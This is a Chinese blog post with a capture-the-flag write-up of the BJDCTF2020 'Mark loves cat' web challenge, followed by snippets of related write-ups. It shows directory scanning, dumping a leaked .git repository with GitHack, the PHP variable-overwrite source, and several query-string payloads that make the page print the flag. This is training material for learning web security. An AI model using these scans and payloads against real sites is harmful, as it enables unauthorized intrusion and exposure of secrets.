[BJDCTF2020]Mark loves cat

原创已于 2024-07-14 07:39:32 修改 · 254 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#php #经验分享 #web安全

于 2024-07-14 07:38:54 首次发布

BUUctf web 专栏收录该内容

17 篇文章

订阅专栏

黑盒直接扫

dirsearch -u http://bba9a212-64d3-4a16-88b4-3605fe3ef749.node5.buuoj.cn:81/ -w /home/kali/Desktop/dirsearch/db/dicc.txt

在这里插入图片描述
我们用GitHack拿一下源码
没有的去下载一下，开源代码

cd GitHack

python GitHack.py http://bba9a212-64d3-4a16-88b4-3605fe3ef749.node5.buuoj.cn:81/.git/

<?php

include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}
//如果传入a=1那么就是赋值$a=1
foreach($_GET as $x => $y){
    $$x = $$y;
}
/*如果传?a=1那么就是$a=$1;
利用这里来带出flag*/
foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){  不强等于字符串直接写就可以不带引号的
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}



echo "the flag is: ".$flag;

看到exit那么我们想到变量覆盖
在这里插入图片描述
我们先随便写试试

?handsome=flag&flag='x'&x='flag'

由于动态赋值所以语法错误了，没成功

?handsome=flag&flag=a&a='flag'
还是有语法错误，但是出flag了

?handsome=flag&flag=a&a=flag
成功

还有其他的payload我一起写出来思路一样的

?is=flag&flag=flag

?yds=flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

baozongwi

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[BJDCTF2020]Mark loves cat (两种解法)（变量覆盖漏洞）

qq_43622442的博客

05-04

8816

[BJDCTF2020]Mark loves cat (两种解法)（变量覆盖漏洞）这几天被学生机折磨死了，第一次用好多不熟练，刷个题压压惊。 1.拿到网站，发现所有的超链接都是指向自己的：（两种答案都在最后） 2.扫描目录找到 .git 泄露：（做ctf题要习惯用dirsearch，而且要调低线程）： dirsearch.py -u url -e * --timeout=2 -t 1 ...

BUUCTF [BJDCTF2020]Mark loves cat

qtL0ng的博客

06-29

3381

打开题目搜索一番没有任何发现； dirsearch扫描后发现.git泄露，GitHack.py下载源码: python GitHack.py http://b77333f7-af9a-4f4a-aad0-b328ef9c8369.node3.buuoj.cn/.git 得到两个php文件，接下来就是代码审计： flag.php: <?php $flag = file_get_contents('/flag'); index.php: <?php include 'flag.php';

参与评论您还未登录，请先登录后发表或查看评论

[BJDCTF2020]Mark loves cat(3种解法)

m0_64118193的博客

07-12

3080

练习靶场：BUUCTF 题目搜索：[BJDCTF2020]Mark loves cat靶机启动后的界面步骤1：我们使用工具dirsearch扫描目录，观察是否有信息泄露结论存在Git泄露，我们使用工具GitHack获取信息，得到一个index.php 相关知识点 exit函数的作用是输出一则消息并且终止当前脚本。如果一段文本中包括多个以 ?>结束的脚本,则exit退出当前所在脚本，exit()函数这里存在一个突破点 foreach()函数这里存在了变量覆盖第二个if语句中可以看到这里是

动态变量——[BJDCTF2020]Mark loves cat的三种解法

最新发布

lubai60060的博客

11-21

1329

对git泄露的了解和对GitHack等工具的掌握对php中动态参数的考察，这里确实容易会被绕晕如果有哪里不对欢迎各位大佬及时指正。即可得到flag对git泄露的了解和对GitHack等工具的掌握对php中动态参数的考察，这里确实容易会被绕晕如果有哪里不对欢迎各位大佬及时指正。

[BJDCTF2020]Mark loves cat1--三种解法清风

weixin_71913298的博客

07-07

2416

知识点： 1.Git源码泄露，检测方法在网址后加上/.git 如果返回403状态码，说明是GIt源码泄露，并学会使用GitHack工具。 2.PHP变量覆盖知识点，在PHP中有语法导致的变量覆盖、函数导致的变量覆盖、配置项导致的变量覆盖。此题只涉及到语法导致的变量覆盖

BUUCTF-Web-Mark loves cat变量函数覆盖

02-16

在题目【BJDCTF2020]Mark loves cat】中，我们看到攻击者通过`.git`泄露获取到了网站的源码。通过运行`GitHack.py`脚本，他们找到了`flag.php`和`index.php`。在`index.php`中，代码检查了`GET`和`POST`中是否都有`...

[BJDCTF2020]Mark loves cat 1

plant1234的博客

05-28

370

[BJDCTF2020]Mark loves cat 1 首先打开题目得到：在网站没有什么发现就扫描一下网站得到：发现有git泄露得到： python2 GitHack.py http://d972792b-613b-488a-af59-f5f8214096e2.node4.buuoj.cn:81/.git/ 得到源码：首先通过代码审计发现如果直接绕开去echo $flag的话在绕过isset()的时候会覆盖flag，输出变量就是空得不到flag 方法一利用exit($handso

buu做题笔记——[BJDCTF2020]Mark loves cat&[MRCTF2020]Ez_bypass&[GKCTF2020]CheckIN

weixin_46330722的博客

11-05

715

BUU[BJDCTF2020]Mark loves cat[MRCTF2020]Ez_bypass [BJDCTF2020]Mark loves cat 进入题目是一个博客首页点了半天没找到可以利用的点，用dirsearch扫一下扫到.git目录，用Githack把源码down下来看一下关键代码 //flag.php <?php $flag = file_get_contents('/flag'); //index.php <?php include 'flag.php';

[BJDCTF2020]Mark loves cat1 --三种解法不会编程的崽的博客

不会编程的崽的博客

02-05

983

ctf mark loves cat

BUUCTF [BJDCTF2020]Mark loves cat个人解题思路

2301_79843470的博客

02-29

880

利用变量覆盖漏洞将yds覆盖成flag，直接使用GET传递yds=flag，当遇到下面这个循环时，yds会被覆盖成flag（其实这个应该有三种解题思路，这是其中一种，刚接触php的题，我也是一知半解）即可，不过我这边下载的时候出现了点问题，下载的git_extract.py是个空白文件。发现下载了两个文件：index.php和flag.php。那我对此的解决方法是在本地下载然后拖进kali里面。首先查看源代码，并开始扫描敏感文件，发现有git泄露。的下载方式，下载网站是这个。

[BJDCTF2020]Mark loves cat(解决githack无法下载源码&&githack无法获取文件)

qq_64201116的博客

06-05

1624

点击这里下载选择安装路径后在该文件夹下路径输入cmd,在命令行中输入python Githack.py 127.0.0.1/.git(你的网址后面有/.git就行) 这里有一题比较简单的变量覆盖题目,可以思考一下我们并不知道$test是什么,但是有个extract($_GET)可以把我们输入的get传参全部变成变量那我们就可以在url输入?test=1&gift=1 即可满足输出flag条件还有一种就是$$x的模式有了这些思路就来进入页面发现没有什么功能点,那就先扫一下有没有文件泄露在githack

CTF-Web习题：[BJDCTF2020]Mark Loves cat

LJW123487的博客

07-17

597

本题知识点：目录扫描、.git源码泄露、PHP变量覆盖漏洞

[BJDCTF2020]Mark loves cat细节详解建议收藏(代码审计一）

qq_50589021的博客

05-31

779

解题一：信息泄露 .git泄露：dirsearch扫描都是推荐低线程哈-s 1，然后githack下载源码解题二：可变变量的覆盖问题 index.php源码泄露： <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ #post出入参数：?test=123将这种格式 $$x = $y; #若传入x=y，则$x=y $test=

[BJDCTF2020]Mark loves cat(特详解)

热门推荐

qq_74806534的博客

02-01

1万+

可变变量：如果一个变量保存的值刚好是另外一个变量的名字，那么可以直接通过访问一个变量得到另外一个变量的值：在变量之前再多加一个 $ 符号。前半段和前面的方法原理相同，让flag覆盖is 后面的flag=flag—>$flag=$flag 目的是为了符合第三个if需求。这里的值表面是 x 但前面我们进行了变量覆盖使得 x=flag 所以在这里我们输出x的值就是flag的值。后面的目的就是让我们传入的变量是 flag 值不是flag 进而能够exit handsome。可以简单理解为$$x就相当于是$($x）

BUUCTF-[BJDCTF2020]Mark loves cat

weixin_57938502的博客

11-20

503

用ctf-wscan扫一下看着有点像git泄露，输入.git查看一下，发现是403拒绝访问，说明存在git泄露只不过我们没法访问可以用lijiejie的GitHack下载一下下载下来打开有两个文件。 flag.php内容是读取flag文件赋值给$flag变量 index.php打开在最下面有一段PHP代码遍历传入的get参数，要求传入的参数的键为flag并且等于$x又要求$x不等于flag，满足要求就会退出脚本。（这个两个要求相互矛盾根本不可能完成）...

[BJDCTF2020]Mark loves cat 1——（超详细三种方法）

m0_62879498的博客

05-05

4344

[BJDCTF2020]Mark loves cat 1 一进入环境，毫无头绪拿御剑或者 dirsearch 扫出了 .git/ 可以猜出，本关一定与git源码泄露有关我们使用GitHack 看能否从网站上扒出源码图上可以看出确实存在 git泄露但，查看文件后却没有找到 php文件。估计是ctf环境的问题可以git init 初始化一下，然后不停的试，总有运气好的一次，能够从网站上扒出源码文件。（也可以直接从网上直接找） <?php include 'flag.php';

[BJDCTF2020]Mark loves cat foreach导致变量覆盖

m0_64180167的博客

09-18

281

已经感觉类似渗透了直接dir扫一下一下就想到git泄露我们直接 githack直接看看源代码flag.phpindex.php这里存在echo 我们直接去看看网站哪里存在输出了然后我们就可以确定现在输出的是$yds变量我们开始代码审计。

变量覆盖漏洞分析：从BUUCTF-Web-Mark loves cat挑战看PHP安全

文章还通过一个名为`BJDCTF2020`的CTF挑战展示了如何利用变量覆盖。在这个例子中，挑战者需要通过分析泄露的`.git`目录获取信息，然后运行特定的Python脚本来解析数据。最终，他们发现了一个含有可变变量的PHP代码段...